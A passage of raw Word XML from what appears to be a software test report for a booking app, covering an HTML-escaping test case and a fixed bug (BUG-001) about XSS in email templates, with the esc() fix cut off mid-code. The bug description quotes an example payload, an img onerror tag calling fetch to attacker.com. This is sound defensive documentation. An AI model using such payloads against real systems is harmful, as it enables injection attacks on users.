          </w:tcPr>
          <w:p w14:paraId="3EF2D1A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r w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="41C035BC" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1F84355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EDGE-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2DFFA97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security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="44143588" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>clientName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> containing </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>O'Brien &amp; Sons</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> — apostrophe and ampersand must be HTML-encoded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5656884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Correctly escaped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="50B819B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PASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05DA517B" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="464AC8A2">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2374898B" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc228978586"/>
      <w:bookmarkStart w:id="28" w:name="bug-report"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Bug Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="48CD5344" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="X32c419e3ddba72e9e444da2d5ae0d2fce1bf747"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BUG-001 — XSS Injection via User-Supplied Fields in Email Templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08003345" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medium</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00CD0784">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>src</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00CD0784">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>/lib/email/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00CD0784">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>templates.ts</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Discovered:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> During TC-EDGE-06 (automated XSS check)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB9032"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Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>All 8 email templates interpolated user-supplied string fields directly into HTML template literals without HTML entity encoding. A client who creates a booking with a crafted name (e.g. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=fetch('https://attacker.com')&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) could inject arbitrary HTML into the booking confirmation email sent to other users. While most email clients block JavaScript execution, HTML injection can still break email layout and, in some clients, load remote resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897957F"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Affected fields across templates:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>clientName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — set by external clients on the public booking page - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>serviceName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>staffName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shopName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shopAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shopPhone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — set by shop owners - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ownerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — set during signup - </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>item.name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>item.category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>item.sku</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — set by shop owners in inventory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4EFFFA"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lastRenderedPageBreak/>
        <w:t>Fix applied:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Added an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>esc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helper function and applied it to all user-supplied string interpolations across all 8 templates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BF07AA" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>esc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>undefined</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
